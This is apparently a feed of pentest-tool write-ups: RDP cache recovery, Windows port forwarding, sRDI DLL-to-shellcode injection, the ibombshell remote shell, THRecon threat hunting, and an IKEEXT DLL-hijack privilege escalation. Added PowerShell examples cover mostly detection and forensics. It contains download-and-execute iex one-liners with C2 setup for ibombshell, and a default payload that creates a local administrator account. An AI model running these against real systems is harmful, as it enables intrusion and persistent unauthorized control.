Remote Desktop Caching – Tool To Recover Old RDP (mstsc) Session Information In The Form Of Broken PNG Files

This tool recovers old RDP (mstsc) session information in the form of broken PNG files reconstructed from the client's bitmap cache. A Red Team member can use these PNG files to extract sensitive information that was displayed on screen during a session, such as LAPS passwords. A Blue Team member can reconstruct the same images to see what an attacker did on a compromised host, and a forensics team can use the timestamps visible in the recovered screen fragments to build a timeline and collect evidence after an attack.

Screenshots

On the first run of Remote-Desktop-Caching (python.exe remotecache.py) the user is presented with the following options:

Option 1 and Option 2 show the current session execution policy and set it to Bypass, which is required to execute the rdpcache.ps1 PowerShell script.
Option 3 lists the cached binary files that will be used to reconstruct the PNG files.
Option 4 starts analysing the cache files and the reconstruction process. This option creates a folder named Recovered_RDP_Sessions on the user's C: drive.

Sensitive information is recovered from these binary files in the form of broken PNG images. The author managed to recover a LAPS password, an attacker IP address and malicious file names, and the images also reveal crucial information about attacker activities on the compromised host. For a forensics team, a timestamp is visible in most of the recovered images.

How do I use this?

git clone https://github.com/Viralmaniar/Remote-Desktop-Caching-.git
python.exe remotecache.py

Questions?

Twitter: https://twitter.com/maniarviral
LinkedIn: https://au.linkedin.com/in/viralmaniar

Download Remote-Desktop-Caching
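Before handing the cache to any reconstruction tool, a responder usually wants to know which profiles on the host have an mstsc bitmap cache at all, when it was last written, and to hash and preserve the files. The following PowerShell function is an added example written for this page; it is not part of the Remote-Desktop-Caching project. The cache directory under each profile is the standard mstsc location; the evidence folder layout and the file name filter are assumptions.

```powershell
# Added example (not the Remote-Desktop-Caching project's own code): enumerate,
# hash and optionally preserve the mstsc bitmap cache of every profile on a host.
function Get-RdpCacheArtifacts {
    [CmdletBinding()]
    param(
        # Root of the user profiles to walk; defaults to the local machine.
        [string]$ProfileRoot = "$env:SystemDrive\Users",
        # Optional folder to copy the cache files into before analysis.
        [string]$EvidenceDir
    )

    $results = foreach ($profile in Get-ChildItem -Path $ProfileRoot -Directory -ErrorAction SilentlyContinue) {
        # Standard mstsc cache location inside a user profile.
        $cacheDir = Join-Path $profile.FullName 'AppData\Local\Microsoft\Terminal Server Client\Cache'
        if (-not (Test-Path -LiteralPath $cacheDir)) { continue }

        # Newer clients write Cache0000.bin style files, older ones bcacheNN.bmc;
        # both hold bitmap tiles and both are worth collecting (filter is an assumption).
        $files = Get-ChildItem -LiteralPath $cacheDir -File |
            Where-Object { $_.Name -match '^(Cache\d+\.bin|bcache\d+\.bmc)$' }

        foreach ($file in $files) {
            [pscustomobject]@{
                User          = $profile.Name
                Path          = $file.FullName
                SizeBytes     = $file.Length
                CreationTime  = $file.CreationTimeUtc
                LastWriteTime = $file.LastWriteTimeUtc   # last RDP session that touched the cache
                Sha256        = (Get-FileHash -LiteralPath $file.FullName -Algorithm SHA256).Hash
            }
        }
    }

    if ($EvidenceDir -and $results) {
        New-Item -ItemType Directory -Path $EvidenceDir -Force | Out-Null
        foreach ($r in $results) {
            # Prefix with the profile name so files from different users do not collide.
            $dest = Join-Path $EvidenceDir ('{0}_{1}' -f $r.User, (Split-Path $r.Path -Leaf))
            # Copy-Item preserves LastWriteTime, so the timeline survives the copy.
            Copy-Item -LiteralPath $r.Path -Destination $dest -Force
        }
    }

    $results | Sort-Object LastWriteTime -Descending
}

# Usage (run as an administrator to read every profile):
# Get-RdpCacheArtifacts -EvidenceDir C:\Evidence\RdpCache |
#     Format-Table User, Path, LastWriteTime, Sha256 -AutoSize
```

Hash the files before running any reconstruction over them, and work on the copies in the evidence folder: the reconstruction step on this page writes its own output, and the original LastWriteTime of the cache is the only timestamp that ties the images to a session.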

Link: http://feedproxy.google.com/~r/PentestTools/~3/VmAcD0fasMY/remote-desktop-caching-tool-to-recover.html

Win-PortFwd – Powershell Script To Setup Windows Port Forwarding Using Native Netsh Client

PowerShell script to set up Windows port forwarding using the native netsh client.

Install:
git clone https://github.com/deepzec/Win-PortFwd.git

Usage:
.\win-portfwd.ps1
or
powershell.exe -noprofile -executionpolicy bypass -file .\win-portfwd.ps1

Note: This script requires admin privileges to run. If you run it under normal user privileges, it will automatically try to elevate.

Download Win-PortFwd
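The netsh portproxy calls the script wraps are worth seeing in full, together with the two things that usually trip people up: the forwarder is implemented by the IP Helper service, so nothing is forwarded while that service is stopped, and portproxy does not open the Windows Firewall for the listening port. The functions below are an added example written for this page, not the Win-PortFwd script itself; the firewall rule name is an assumption.

```powershell
# Added example, not the Win-PortFwd script: add, list and remove a netsh
# portproxy rule with the checks a practitioner normally wants around it.
function Test-IsAdministrator {
    $identity  = [Security.Principal.WindowsIdentity]::GetCurrent()
    $principal = New-Object Security.Principal.WindowsPrincipal($identity)
    $principal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)
}

function Add-PortForward {
    param(
        [Parameter(Mandatory)][int]$ListenPort,
        [Parameter(Mandatory)][string]$ConnectAddress,
        [Parameter(Mandatory)][int]$ConnectPort,
        [string]$ListenAddress = '0.0.0.0',
        # Also open the host firewall for the listening port; portproxy alone does not.
        [switch]$OpenFirewall
    )
    if (-not (Test-IsAdministrator)) { throw 'netsh portproxy requires an elevated prompt.' }

    # portproxy lives in the IP Helper service; start it if it is not running.
    if ((Get-Service -Name iphlpsvc).Status -ne 'Running') { Start-Service -Name iphlpsvc }

    netsh interface portproxy add v4tov4 listenaddress=$ListenAddress listenport=$ListenPort connectaddress=$ConnectAddress connectport=$ConnectPort | Out-Null
    if ($LASTEXITCODE -ne 0) { throw "netsh failed with exit code $LASTEXITCODE" }

    if ($OpenFirewall) {
        # Rule name is an assumption; keep it free of spaces so netsh sees one token.
        netsh advfirewall firewall add rule name=PortFwd_$ListenPort dir=in action=allow protocol=TCP localport=$ListenPort | Out-Null
    }
}

function Get-PortForward {
    # The same rules persist in the registry under
    # HKLM\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4\tcp, which is
    # where a blue team should look for forwarders left behind on a host.
    netsh interface portproxy show v4tov4
}

function Remove-PortForward {
    param(
        [Parameter(Mandatory)][int]$ListenPort,
        [string]$ListenAddress = '0.0.0.0'
    )
    if (-not (Test-IsAdministrator)) { throw 'netsh portproxy requires an elevated prompt.' }
    netsh interface portproxy delete v4tov4 listenaddress=$ListenAddress listenport=$ListenPort | Out-Null
    netsh advfirewall firewall delete rule name=PortFwd_$ListenPort | Out-Null
}

# Usage (elevated): forward local TCP 4444 to 10.0.0.5:3389, inspect, then clean up.
# Add-PortForward -ListenPort 4444 -ConnectAddress 10.0.0.5 -ConnectPort 3389 -OpenFirewall
# Get-PortForward
# Remove-PortForward -ListenPort 4444
```

Because the rules survive reboots in the PortProxy registry key, always pair an add with a remove at the end of an engagement, and consider that key (plus iphlpsvc being started on a workstation that never used it) as a detection source.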

Link: http://feedproxy.google.com/~r/PentestTools/~3/SoNwYOjrkQE/win-portfwd-powershell-script-to-setup.html

Venmo, Oracle, & Linux – Application Security Weekly #25

Venmo caught publishing all transactions publicly, Oracle releases critical patches, Microsoft releases PowerShell Core for Linux, Health insurers are vacuuming up details about you, changing your screen to Grayscale can help fight phone addiction, when to ‘purchase’ a solution to your cybersecurity problem, & more on this episode of Application Security Weekly! Bugs, Breaches, and […]
The post Venmo, Oracle, & Linux – Application Security Weekly #25 appeared first on Security Weekly.

Link: http://feedproxy.google.com/~r/securityweekly/Lviv/~3/Hj0R0MfkEGo/

sRDI – Shellcode Implementation Of Reflective DLL Injection

sRDI allows for the conversion of DLL files to position-independent shellcode. Functionality is accomplished via two components:

A C project which compiles a PE loader implementation (RDI) to shellcode
Conversion code which attaches the DLL, RDI, and user data together with a bootstrap

This project is comprised of the following elements:

ShellcodeRDI: Compiles shellcode for the DLL loader
NativeLoader: Converts DLL to shellcode if necessary, then injects into memory
DotNetLoader: C# implementation of NativeLoader
Python\ConvertToShellcode.py: Convert DLL to shellcode in place
Python\EncodeBlobs.py: Encodes compiled sRDI blobs for static embedding
PowerShell\ConvertTo-Shellcode.ps1: Convert DLL to shellcode in place
FunctionTest: Imports sRDI C function for debug testing
TestDLL: Example DLL that includes two exported functions for call on Load and after

The DLL does not need to be compiled with RDI; however, the technique is cross-compatible.

Use Cases / Examples

Before use, it is recommended that you become familiar with Reflective DLL Injection and its purpose.

Convert DLL to shellcode using Python:
from ShellcodeRDI import *
dll = open("TestDLL_x86.dll", 'rb').read()
shellcode = ConvertToShellcode(dll)

Load DLL into memory using the C# loader:
DotNetLoader.exe TestDLL_x64.dll

Convert DLL with the Python script and load with the native EXE:
python ConvertToShellcode.py TestDLL_x64.dll
NativeLoader.exe TestDLL_x64.bin

Convert DLL with PowerShell and load with Invoke-Shellcode:
Import-Module .\Invoke-Shellcode.ps1
Import-Module .\ConvertTo-Shellcode.ps1
Invoke-Shellcode -Shellcode (ConvertTo-Shellcode -File TestDLL_x64.dll)

Stealth Considerations

There are many ways to detect memory injection. The loader function implements two stealth improvements on traditional RDI:

Proper Permissions: When relocating sections, memory permissions are set based on the section characteristics rather than one massive RWX blob.
PE Header Cleaning (Optional): The DOS header and DOS stub of the target DLL are completely wiped with null bytes on load (except for e_lfanew). This can be toggled with 0x1 in the flags argument for C/C#, or via command line args in Python/PowerShell.

Building

This project is built using Visual Studio 2015 (v140) and Windows SDK 8.1. The Python script is written using Python 3.

The Python and PowerShell scripts are located at:
Python\ConvertToShellcode.py
PowerShell\ConvertTo-Shellcode.ps1

After building the project, the other binaries will be located at:
bin\NativeLoader.exe
bin\DotNetLoader.exe
bin\TestDLL_.dll
bin\ShellcodeRDI_.bin

Download sRDI
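To see what the optional PE header cleaning actually removes, and what it leaves behind for a memory scanner, the following PowerShell functions are an added example written for this page; they are not sRDI's own loader code. sRDI performs the wipe on the mapped image in memory at load time; here the same operation is applied to a byte array read from a DLL on disk so the result can be inspected without injecting anything. The function names and the check for the DOS stub text are assumptions.

```powershell
# Added example, not sRDI's code: reproduce the "PE Header Cleaning" step on an
# in-memory copy of a DLL and verify what survives it. Nothing is written to disk.
function Clear-PeDosHeader {
    param([Parameter(Mandatory)][byte[]]$Image)

    $copy = [byte[]]$Image.Clone()
    if ($copy.Length -lt 0x40 -or $copy[0] -ne 0x4D -or $copy[1] -ne 0x5A) {
        throw 'Not a PE image: missing MZ signature.'
    }
    # e_lfanew sits at DOS header offset 0x3C and points at the "PE\0\0" signature.
    $eLfanew = [BitConverter]::ToInt32($copy, 0x3C)
    if ($eLfanew -lt 0x40 -or $eLfanew + 4 -gt $copy.Length) { throw 'Bad e_lfanew.' }
    if ([BitConverter]::ToUInt32($copy, $eLfanew) -ne 0x00004550) { throw 'Missing PE signature.' }

    # Wipe everything before the NT headers (DOS header + DOS stub), keeping only
    # the four e_lfanew bytes so a loader can still locate the NT headers.
    for ($i = 0; $i -lt $eLfanew; $i++) {
        if ($i -lt 0x3C -or $i -gt 0x3F) { $copy[$i] = 0 }
    }
    $copy
}

function Test-HeaderClean {
    param([Parameter(Mandatory)][byte[]]$Image)
    $eLfanew  = [BitConverter]::ToInt32($Image, 0x3C)
    $mzGone   = ($Image[0] -eq 0) -and ($Image[1] -eq 0)
    # The stock DOS stub carries "This program cannot be run in DOS mode." (assumed present).
    $stubGone = -not ([Text.Encoding]::ASCII.GetString($Image, 0, $eLfanew) -match 'This program')
    $peIntact = [BitConverter]::ToUInt32($Image, $eLfanew) -eq 0x00004550
    [pscustomobject]@{ MzGone = $mzGone; StubGone = $stubGone; PeSignatureIntact = $peIntact }
}

# Usage:
# $dll = [IO.File]::ReadAllBytes('C:\path\TestDLL_x64.dll')
# Test-HeaderClean (Clear-PeDosHeader $dll)   # MzGone and StubGone true, PE signature still there
```

The point the output makes is that header cleaning defeats scanners that key on the MZ signature or the DOS stub string, but the PE signature, the optional header and the section table are still present at e_lfanew, so a scanner that walks memory regions looking for "PE\0\0" and a plausible section table will still find the image.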

Link: http://feedproxy.google.com/~r/PentestTools/~3/L7k0Is7EfEY/srdi-shellcode-implementation-of.html

Ibombshell – Dynamic Remote Shell

ibombshell is a tool written in PowerShell that allows you to have a prompt at any time with post-exploitation functionalities (and in some cases exploitation). It is a shell that is downloaded directly to memory, providing access to a large number of pentesting features. These functionalities can also be downloaded directly to memory, in the form of PowerShell functions. This form of execution is known as everywhere.

In addition, ibombshell provides a second execution mode called Silently, in which the pentester runs an instance of ibombshell (called a warrior) on the compromised computer. The warrior connects to a C2 panel over HTTP, so the pentester can control it remotely and load functions into its memory during the post-exploitation phase.

Prerequisites

To run ibombshell everywhere it is mandatory to have PowerShell 3.0 or higher. For operating systems other than Windows you can read more about this in the PowerShell GitHub: PowerShell for every system!

To run the ibombshell silently mode you need Python 3.6 and some Python libraries. You can install these with:
cd ibombshell\ c2/
pip install -r requirements.txt
Note: the ibombshell C2 works on Python 3.X. Make sure you run a pip relative to this version.

Usage

ibombshell has two execution modes:

ibombshell everywhere

To load ibombshell, simply run in PowerShell:
iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/ElevenPaths/ibombshell/master/console')
Now you can run the downloaded ibombshell console by running:
console

ibombshell silently mode

This version allows you to run the ibombshell console and remotely control it from the C2 panel written in Python. To run this version, first launch the console process in PowerShell:
iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/ElevenPaths/ibombshell/master/console')
From the ibombshell C2 path, prepare the C2:
python3 ibombshell.py
And create the listener to which the warriors will connect:
iBombShell> load modules/listener.py
[+] Loading module…
[+] Module loaded!
iBombShell[modules/listener.py]> run
The default listener port is 8080. Finally, launch the console in silently mode on the host to get remote control:
console -Silently -uriConsole http://[ip or domain]:[port]

ibombshell C2 scheme

The basic operation of the ibombshell control panel follows this scheme (warrior on one side, C2 on the other):

1. warrior -> C2: new ibombshell
2. C2: registers the warrior by its source IP
3. warrior -> C2: get functions and instructions
4. C2 -> warrior: send functions and instructions
5. warrior: execute
6. warrior -> C2: results

Docker

We have created a Docker container with everything you need to make it work. Run these commands from the Dockerfile location:
sudo docker build -t "ibombshell" .
sudo docker run -it ibombshell

Example videos

Some example videos:
iBombShell: PoC Warrior + Bypass UAC + Pass the hash
iBombShell: macOS
ibombshell: Extracting Private SSH Keys on Windows 10
iBombShell: PoC savefunctions

Download Ibombshell

Link: http://feedproxy.google.com/~r/PentestTools/~3/9atiVxsUoj8/ibombshell-dynamic-remote-shell.html

THRecon – Threat Hunting Reconnaissance Toolkit

Collect endpoint information for use in incident response triage, threat hunting and live forensics using this toolkit. When a security alert raises concern over a managed system, this toolkit aims to give the analyst as much relevant information as possible to help determine whether a compromise occurred. Alternatively, the output of this tool may be ingested into an analysis tool like ELK, Graylog, or Splunk for stack-counting and other analysis techniques.

Requires PowerShell 5.0 or above on the "scanning" device.
Requires PowerShell 3.0 or higher on target systems (2.0 may be adequate in some cases).

Information Collected (linked to hunt use cases)

Host Info, Processes*, Services, Autoruns, Drivers, ARP, DLLs*, EnvVars, Hosts File, ADS, DNS, Strings*, Users & Groups, Ports, Select Registry, Hotfixes, Handles*, Software, Hardware, Event Logs, Net Adapters, Net Routes, Sessions, Shares, Certificates, Scheduled Tasks, TPM, Bitlocker, Recycle Bin, User Files

* Info pulled from currently running processes or their executables on disk.

Quick Install

Run this command in PowerShell with git installed, then open a new PowerShell session:
git clone https://github.com/TonyPhipps/THRecon C:\Users\$env:UserName\Documents\WindowsPowerShell\Modules\THRecon

Without git, make the folder, then drop all the contents of this project into it and open a new PowerShell session:
mkdir C:\Users\$env:UserName\Documents\WindowsPowerShell\Modules\THRecon\

Quick Test Use

To run a "quick" scan on your own system, create a blank folder, then run the cmdlet from within that folder, since output defaults to the current working directory:
mkdir c:\temp\
cd c:\temp\
Invoke-THR -Quick

Troubleshooting

Installing a PowerShell module: if your system does not automatically load modules in your user profile, you may need to import the module manually:
cd C:\Users\$env:UserName\Documents\WindowsPowerShell\Modules\THRecon\
Import-Module THRecon.psm1

Screenshots

Output of command "Invoke-THR"
Output files

Download THRecon
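Stack-counting, which the description mentions as the reason to ingest the output into ELK, Graylog or Splunk, also works directly in PowerShell on the CSV files the toolkit writes. The function below is an added example written for this page and is not part of THRecon; the sample CSV is constructed here to look like a per-host process listing, and the column names (Host, Name, Path, Hash) are an assumption that you would map onto the real output files.

```powershell
# Added example, not part of THRecon: stack-count one or more fields across the
# CSV output of many hosts so that values seen on only a few hosts float to the top.

# Constructed sample data shaped like a per-host process listing (assumed columns).
$sampleCsv = @'
Host,Name,Path,Hash
WS01,svchost.exe,C:\Windows\System32\svchost.exe,AAA
WS02,svchost.exe,C:\Windows\System32\svchost.exe,AAA
WS03,svchost.exe,C:\Windows\System32\svchost.exe,AAA
WS03,svchost.exe,C:\Users\Public\svchost.exe,BBB
WS01,explorer.exe,C:\Windows\explorer.exe,CCC
WS02,explorer.exe,C:\Windows\explorer.exe,CCC
WS03,explorer.exe,C:\Windows\explorer.exe,CCC
'@

function Get-StackCount {
    param(
        [Parameter(Mandatory, ValueFromPipeline)][object[]]$Records,
        # Property (or properties) to stack on; Path plus Hash catches renamed binaries.
        [string[]]$Property = @('Path', 'Hash'),
        # Values present on at most this many hosts are flagged as outliers.
        [int]$RareThreshold = 1
    )
    begin   { $all = @() }
    process { $all += $Records }
    end {
        $all | Group-Object -Property $Property | ForEach-Object {
            # Count distinct hosts, not rows: a value seen 50 times on one host is still rare.
            $hosts = @($_.Group | Select-Object -ExpandProperty Host -Unique)
            [pscustomobject]@{
                Value     = $_.Name
                Count     = $_.Count
                HostCount = $hosts.Count
                Hosts     = $hosts -join ','
                Rare      = $hosts.Count -le $RareThreshold
            }
        } | Sort-Object HostCount, Count
    }
}

# Usage on the constructed data: the svchost.exe outside System32 (one host, hash BBB)
# sorts to the top with Rare = True.
$sampleCsv | ConvertFrom-Csv | Get-StackCount | Format-Table -AutoSize

# Real data, assuming one output folder per host:
# Get-ChildItem C:\THR\*\Processes.csv | Import-Csv | Get-StackCount
```

Stack on the columns that an attacker cannot easily blend into (path plus hash, or signer plus path) rather than on process name alone, since the sample's point is precisely a legitimate-looking name in an unusual location.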

Link: http://feedproxy.google.com/~r/PentestTools/~3/KOMA6v97YXM/threcon-threat-hunting-reconnaissance.html

Ikeext-Privesc – Windows IKEEXT DLL Hijacking Exploit Tool

This tool is intended for automatically detecting and exploiting the IKE and AuthIP IPsec Keyring Modules Service (IKEEXT) missing DLL vulnerability.

Description

A major weakness is present in Windows Vista, 7, 8, Server 2008, Server 2008 R2 and Server 2012, which allows any authenticated user to gain SYSTEM privileges under certain circumstances.

In Windows there is a service called IKEEXT (IKE and AuthIP IPsec Keyring Modules), which runs as SYSTEM and tries to load a DLL that doesn't exist. The default DLL search order of Windows includes several system directories and ends with the PATH folders. Put simply, if one of these folders is configured with weak permissions, any authenticated user can plant a malicious DLL there to execute code as SYSTEM and thus elevate his/her privileges.

IKEEXT trying to load 'wlbsctrl.dll':

Usage

This PowerShell script consists of 2 Cmdlets:
Invoke-IkeextCheck – Only checks whether the machine is vulnerable.
Invoke-IkeextExploit – If the machine is vulnerable, exploits it by dropping a specifically crafted DLL to the first weak folder.

Detection

The Invoke-IkeextCheck Cmdlet performs the following checks:
OS version – If the OS is Windows Vista/7/8, the machine is potentially vulnerable.
IKEEXT status and start type – If the service is enabled (the default), the machine is potentially vulnerable.
PATH folders with weak permissions – If at least one such folder is found, the machine is potentially vulnerable.
Is wlbsctrl.dll already present in some system folder (i.e. a folder DLLs can be loaded from)? – If wlbsctrl.dll doesn't exist (the default), the machine is potentially vulnerable.

Syntax:
Invoke-IkeextCheck [-Verbose]
Example:
PS C:\temp> . .\Ikeext-Privesc.ps1
PS C:\temp> Invoke-IkeextCheck -Verbose

Exploit

If the machine is vulnerable, the Invoke-IkeextExploit Cmdlet will perform the following, depending on the IKEEXT start type:
AUTO – The exploit files are dropped to the first weak PATH folder, provided that the switch '-Force' was set on the command line (safety override).
MANUAL – The exploit files are dropped to the first weak PATH folder. Then the service start is triggered by trying to open a dummy VPN connection (using rasdial).

The following exploit files are dropped to the first vulnerable folder:
wlbsctrl.dll – A specifically crafted DLL (32 & 64 bit) that starts a new CMD process and executes a BATCH file.
wlbsctrl_payload.bat – The BATCH file that will be executed.

BATCH payload:
Default – A default BATCH payload is included in this script. It uses net user and net localgroup to create a new user (hacker with password SuperP@ss123) and add it to the local administrators group (the name of the group is automatically retrieved by the script).
Custom – A custom set of commands can be specified using the parameter -Payload .\Path\To\File.txt, pointing to a file containing one command per line.
Log file – Each payload command's output is redirected to a log file located in the same folder as the DLL. Its name will be something like wlbsctrl_xxxxxxxx.txt, so if this file is not created, the payload was not executed.

Syntax:
Invoke-IkeextExploit [-Verbose] [-Force] [[-Payload] ]
Example:
PS C:\temp> . .\Ikeext-Privesc.ps1
PS C:\temp> Invoke-IkeextExploit

Credits

High-Tech Bridge – Frédéric Bourla, who initially discovered the vulnerability and disclosed it on October 9, 2012. – https://www.htbridge.com/advisory/HTB23108

Remediation

First of all, it's important to note that this vulnerability was patched in Windows 8.1 and above. In these versions of Windows, the wlbsctrl.dll search is limited to C:\Windows\System32\.

If you're stuck with Windows 7 / Server 2008 R2, because of compatibility issues for example, several countermeasures can be applied:
PATH folders with weak permissions – Some applications are installed directly in C:\ and add themselves to the PATH environment variable. By default, folders created in C:\ are writable by any authenticated user, so make sure to remove those write permissions.
Disable IKEEXT – In most cases, IKEEXT can simply be disabled by applying a GPO. This can be a good solution for servers but it is not advised for workstations.
Deploy your own DLL – Deploying a dummy wlbsctrl.dll in C:\Windows\System32\ for example is an efficient solution, since this directory has a higher priority than the PATH folders in the search order.

Download Ikeext-Privesc
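The four detection checks listed above are easy to run fleet-wide without touching the exploit half of the script. The function below is an added example written for this page, not the Ikeext-Privesc script's own Invoke-IkeextCheck; it is read-only and mirrors the same four conditions. The writability probe (creating and deleting an empty file in each PATH folder) and the function name are assumptions; run it as the ordinary user whose privileges you care about, because as an administrator every folder looks writable.

```powershell
# Added example, not the Ikeext-Privesc script: the README's four checks as one
# read-only cmdlet. No DLL or payload is dropped.
function Get-IkeextExposure {
    [CmdletBinding()]
    param()

    # 1. OS version via WMI (not [Environment]::OSVersion, which can lie under compat shims).
    #    6.0 = Vista/2008, 6.1 = 7/2008 R2, 6.2 = 8/2012; 6.3 (8.1) and later are patched.
    $ver = [version](Get-WmiObject -Class Win32_OperatingSystem).Version
    $osAffected = ($ver.Major -eq 6 -and $ver.Minor -le 2)

    # 2. IKEEXT start type: anything but Disabled means the service can be started.
    $svc = Get-WmiObject -Class Win32_Service -Filter "Name='IKEEXT'"
    $serviceEnabled = [bool]$svc -and $svc.StartMode -ne 'Disabled'

    # 3. Is wlbsctrl.dll already in a system directory searched before PATH?
    $systemDirs = @("$env:SystemRoot\System32", "$env:SystemRoot\System", $env:SystemRoot)
    $dllPresent = @($systemDirs | Where-Object { Test-Path (Join-Path $_ 'wlbsctrl.dll') }).Count -gt 0

    # 4. PATH folders the current user can write to. Creating and removing a
    #    temp file is more reliable than interpreting ACLs by hand (assumed approach).
    $weakFolders = foreach ($dir in ($env:PATH -split ';' | Where-Object { $_ } | Select-Object -Unique)) {
        if (-not (Test-Path -LiteralPath $dir -PathType Container)) { continue }
        $probe = Join-Path $dir ('ikeext_probe_{0}.tmp' -f [guid]::NewGuid())
        try {
            [IO.File]::WriteAllText($probe, '')
            Remove-Item -LiteralPath $probe -Force
            $dir
        } catch { }
    }

    [pscustomobject]@{
        OsVersion       = $ver.ToString()
        OsAffected      = $osAffected
        IkeextStartMode = if ($svc) { $svc.StartMode } else { 'NotInstalled' }
        IkeextEnabled   = $serviceEnabled
        DllAlreadyThere = $dllPresent
        WeakPathFolders = @($weakFolders)
        # All four conditions must hold for the DLL hijack described above to work.
        Vulnerable      = $osAffected -and $serviceEnabled -and (-not $dllPresent) -and (@($weakFolders).Count -gt 0)
    }
}

# Usage (as a standard user on the machine under test):
# Get-IkeextExposure | Format-List
```

WeakPathFolders is the field worth keeping even on patched systems: a world-writable directory on the system PATH is a hijack opportunity for any other service or scheduled task that searches PATH for a missing DLL, not only IKEEXT.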

Link: http://feedproxy.google.com/~r/PentestTools/~3/RauB3rWqdtA/ikeext-privesc-windows-ikeext-dll.html